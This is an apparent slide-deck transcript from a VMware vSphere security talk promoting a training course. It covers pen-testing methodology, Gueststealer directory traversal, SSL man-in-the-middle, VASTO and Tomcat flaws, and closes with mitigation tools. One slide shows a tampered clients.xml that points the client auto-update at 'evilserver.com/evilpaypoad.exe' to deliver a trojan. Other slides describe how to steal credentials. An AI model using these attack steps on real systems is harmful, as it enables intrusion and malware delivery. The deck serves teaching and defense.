VASTO - VMware
Download
Report
Transcript VASTO - VMware
Free Drawing for 1 seat in the VMware Advanced
Security Class with Firebrand.
vSphere Just Another Layer to Attack?
Recent Cases involving VMware
Pen Testing Methodology
Gueststealer
TomCat Zero Day
Directory Traversal
VASTO
Mitigation Techniques
3rd Party Mitigation Tools
VMware – 80% of the Market Share
Do the Tools used in Pen Testing work with
virtualization?
Are there hacks being designed just for VMware?
What is this costing us?
Hackin9 – Issue 01/2011(37)
• CyberCrime and CyberWar
Predictions for 2011
• #2 – Cloud Computing and Virtual
Machines (VM) will be specifically
targeted by cybercriminals and cyber
terrorists resulting in VM malware
and Cloud downtime and Cloud data
theft.
What are the main security concerns associated with
virtualization in general?
Segregation of Duties
Accounting/Logging
New API’s
VMsafe
vStorage
vNetwork
VMsafe Virtual Appliances
Plug-Ins
Share Resources – can they be attacked?
Memory, CPU, Datastore
Management
Interfaces
• vSphere Client
• API’s
• Plugin’s - VMware
• Update Manager
• Guided Consolidation
• VMware Converter
• Storage vMotion
• Plugin’s - 3rd Party
• Back Up Solutions (3rd Party - Veeam)
• RDP - (3rd Party - The RDP plug-in, by
Juxtaposition)
• Invoke Plugin
ESX and vCenter
both use a Web
Service
• vCenter on by
default – Why?
• ESX disabled –
Thank God
Tomcat Web
Service
• How many holes
have we found
here? WOW
Utilizes a Proxy
• The is the same
proxy used by
hostd.
VMware is using an old
version of TomCat that leaves
the username and password
in a world readable file!
Fixed by a recent update for
vCenter 4.1
VMCI, or Virtual Machine Communications
Interface is an interface designed in the hardware
of a VM.
• It provides communication between VMs and trusted
endpoints on the host, and from VM to VM. The vmkernel
is considered a trusted end-point.
• This interface is implemented as a virtual PCI device,
present by default in all VMs created with virtual
hardware version 7.
http://pubs.vmware.com/vmci-sdk/VMCI_intro.html
Threats
Perceived
Known
Risks
Probability
Potential Impact
Secunia Historic Advisories
ESX 4.x
ESXi 4.x
vCenter Server 4.x
nvd.nist.gov
Over 40 Vulnerabilities for VMware Products
McAfee Threats
VMware
ESX Server Heap Buffer Overflow
vCenter Update Manager CSS
vCenter Update Manager Directory Traversal
130 Million Credit Cards Stolen – Gonzalez
Indictment
•
•
•
•
•
•
•
SQL Injection Attacks
SQL Injection Strings
Malware
Root kits
Visiting the stores
Disabling the logs
Using Proxies
Little Known Fact:
Occurred on VMware!!!!
This does not change, regardless of the environment
being tested.
Information Gathering
Scanning
Enumeration
Penetration
Fail
Start Over or tell them great job
Succeed
Escalate Privileges
Steal Data or Leave proof of hack
Cover Tracks
Leave Backdoors
Google
NMAP – Since v4.8
Ettercap
Cain and Abel
Metasploit
Claudio Criscione
VASTO – Virtualization ASsessment
TOolkit
We have to find the systems first.
Just like any other service, ESX has its own tells.
NMAP – will give you what you need.
Lets see this in action!
Auxiliary
Modules
Meterpreter
• Yes you can create your own modules.
• We will take a look at VASTO – Virtualization
ASsessment Toolkit by Claudio Criscione
• The purpose of meterpreter scripts are to give end-users
an easy interface to write quick scripts that can be run
against remote targets after successful exploitation.
(Metasploit)
• Meterpreter is an effective tool for creating backdoors.
ESX
Sever
SSL request
SSL request
Stop
SSL reply
(Fake certificate)
F&JLMDHGST*KU
Copy &
Alter
Cleartext
SSL reply
(Real Self Signed Cert)
P)JDGH$FDSD@
ARP Cache Poisoning will allow us to perform a successful SSL
crack!
The hacking tools will create fake certificates.
Two simultaneous SSL connections are established. One between
the victim and the hacker, the other between the hacker and the real
server.
The communication process starts on port 443 and once the SSL
authentication has been established VMware moves the
communication to port 902.
VIC
Client
Login
You are still vulnerable even if you use vCenter.
I can offer this:
Once the above password is stolen you can login to
the host with the vpxuser and above password.
VULNERABLE VERSIONS
•
•
•
•
•
•
•
Server
VMware Server 2.x < 2.0.2 build 203138 (Linux)
VMware Server 1.x < 1.0.10 build 203137 (Linux)
ESX/ESXi
ESX 3.5 w/o ESX350-200901401-SG
ESX 3.0.3 w/o ESX303-200812406-BG
ESXi 3.5 w/o ESXe350-200901401-I-SG
GuestStealer
Dictionary
Attack
Fingerprinting
Tool
• Thanks for the Virtual
Machines!
• How Large is your
dictionary file?
• Need to know exactly
what is running?
Client
Server
GET /client/clients.xml
1
AutoUpdate URL
RetrieveServiceInstance
2
ServiceInstance
RetrieveServiceStatus
3
Status
GET /client/clients.xml
4
Autoupdate URL
Login
Auto Update Process
• <patchVersion>3.0.0</patchVersion>
• <apiVersion>3.1.0</apiVersion>
• <downloadUrl>https://*/client/VMware-viclient.exe</downloadUrl>
The Auto
Update Process
The Evil Guy
• <patchVersion>3.0.0</patchVersion>
• <apiVersion>3.1.0</apiVersion>
• <downloadUrl>https://*/client/VMwareviclient.exe</downloadUrl>
• <patchVersion>10.0.0</patchVersion>
• <apiVersion>3.1.0</apiVersion>
• <downloadUrl>https://evilserver.com/evilpay
poad.exe</downloadUrl>
Change the
clients.xml filename
The package will run
under the user’s
privilege!
• Administrator Anyone?
Provide your nasty
trojan package.
• Could be combined with
other attacks.
You will trigger a
“certificate error”
This can be done as
MiTM or Rouge
Server
Create a fake web
interface so you look
ligit!
Autopwn – How easy can
it get?
Uses a flaw in the
Tomcat Web Server
Transfers the Latest
Session File from
vCenter using a
Directory Traversal
Attack.
Admin rights without
knowing a username or
password!
Mitigation
Tools –
Best of the
Breed
• Vmware
• vShield Zones
• 3rd Party
• Altor
• Reflex
• CheckPoint
• Astaro Security Gateway
• Tripwire
• Catbird
• HyTrust
Trend Micro Deep Security provides advanced security
for physical, virtual, and cloud servers and virtual
desktops.
Modules
Agentless Malware Detection for VMs
Deep Packet Inspection
Intrusion Detection and Prevention
Web Application and Protection
Application Control
Bidirectional Stateful Firewall
Integrity Monitoring
Log Inspection
Catbird TrustZones® policybased security envelope for
virtual infrastructures and the
cloud. Enforces protection and
measures compliance across
virtual clusters and data centers.
Catbird virtual security appliance
performs several functions:
Hypervisor auditing
Virtual network IPS
Network segmentation and
access control
Vulnerability management
Multi-tenant security
Reports to management console
Catbird appliances collect data and enforce policies
Appliances report events to management console
Management console analyses events and
correlates to compliance framework
Course Introduction and Methodology
2. Penetration Testing 101
3. Primer and Reaffirming our Knowledge
4. Security Architecture, vCPU, vMemory
5. Routing and the vNetwork
6. vStorage – Architecture and Security Implementations
7. Hardening the Virtual Machines
8. Hardening the Host
9. Hardening Virtual Center
10. Virtualizing your DMZ
11. 3rd Party Mitigation Tools
12. Putting it all Together
1.
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
Course Intro & Methodology
Virtualization Overview
Planning & Installing ESX/ESXi 4
Using Tools to Administer a VMware Environment
Configuring Networking
Configuring Storage
vCenter Server 4 and Licensing
VM Creation and Configuration & Snapshots
Security and Permissions
Server and VM Monitoring
Advanced ESX and vCenter Management
Patching and Upgrading ESX/ESXi
Disaster Recovery and Backup
50 Hours of Training – 6.5 Classes in ONE
Does vSphere
really have some
major issues?
Recent Cases
involving ESX
Pen Testing
Methodology
Web Related
issues
VASTO
Mitigation
techniques
Questions?